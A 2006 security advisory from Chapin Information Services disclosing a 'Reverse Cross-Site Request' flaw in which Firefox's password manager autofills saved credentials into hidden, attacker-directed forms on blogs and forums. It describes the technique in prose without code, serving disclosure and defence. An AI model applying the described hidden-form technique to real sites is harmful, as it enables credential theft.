|
11/21/2006 — Chapin Information
Services (CIS) has discovered a new flaw
in the Mozilla Firefox web browser that exposes saved passwords to clever attackers.
Given the new nature of this type of attack, CIS has named this a
Reverse Cross-Site Request (RCSR) vulnerability.
This flaw could affect anyone visiting a weblog or forum website that allows
user-contributed HTML codes to be added.
A proof-of-concept demonstration is available at the CIS website.
RCSR attacks are also actively targeting Microsoft Internet Explorer,
however a flaw in Firefox makes the attack much more likely to succeed.
The Password Manager component of FireFox can be exploited to send a
username and password combination to an attacker's computer without the user's knowledge.
Users of both Firefox and Internet Explorer need to be aware that their information
can be stolen in this way when visiting blog and forum websites at trusted addresses.
A recent large-scale attack using RCSR targeted MySpace.com users and was
first reported by Netcraft 10/27/2006.
That incident involved fake login forms
on the MySpace website inviting users to type in their username and password.
Forms and links have been used in a similar way to carry out Cross-Site
Request Forgery (CSRF) attacks. The difference between CSRF and this new breed
of RCSR attacks is the direction of data flow.
CSRF attacks are commonly used to add content to a blog or forum without
the user's knowledge. This can be done by "forging" a link or form that the
website does not correctly verify with the user.
RCSR, by contrast, takes content from the blog or forum by creating a form
on the website directed back to the attacker.
The RCSR attack is much more likely to succeed because neither Internet Explorer
nor Firefox are designed to check the destination of form data before the user submits them.
The user sees a trusted website address in the browser's address bar because the
exploit is conducted at the trusted website.
On 11/12/2006, CIS reported to Mozilla that the Firefox web browser will
automatically fill saved usernames and passwords into such RCSR forms. This behavior
does not occur in Internet Explorer unless the RCSR form appears on the same page
as a legitimate login form.
|
Exacerbating this problem is the fact that forms can be completely hidden
from view. As demonstrated in the CIS proof-of-concept, after saving a website
password in Firefox, it is possible for that password to be transmitted to another
website by unwittingly clicking on an invisible image link.
Mozilla confirmed this as bug number 360493, and said they are already
working on a fix for version 2.0.0.1 or 2.0.0.2.
Suggestions have been made about the benefits of website changes as well
as browser updates to combat RCSR problems. These are increasingly valid concerns
for webmasters. However, a flawed Password Manager will have to be fixed by the
authors. CIS has recommended several changes to both Firefox and Internet Explorer.
Microsoft responded by saying, "We are aware of the issue you reported."
And, "As a matter of policy, we cannot comment on ongoing investigations."
Webmasters need to be aware of the implications of RCSR forms and how they
work once added to a website. No client-side scripting is needed to steal information
in this way, so this is not a Cross-Site Scripting (XSS) attack.
CIS recommends all webmasters review server code for the possibility of XSS
and RCSR injections, especially operators of encrypted websites. These attacks could
be highly effective against firewalled local network servers and HTTPS addresses that
are not otherwise accessible because the attacker does not need direct access.
In theory, combined CSRF and RCSR injections could change the appearance
of a website and steal the user's password, even if scripts are filtered from
user data.
|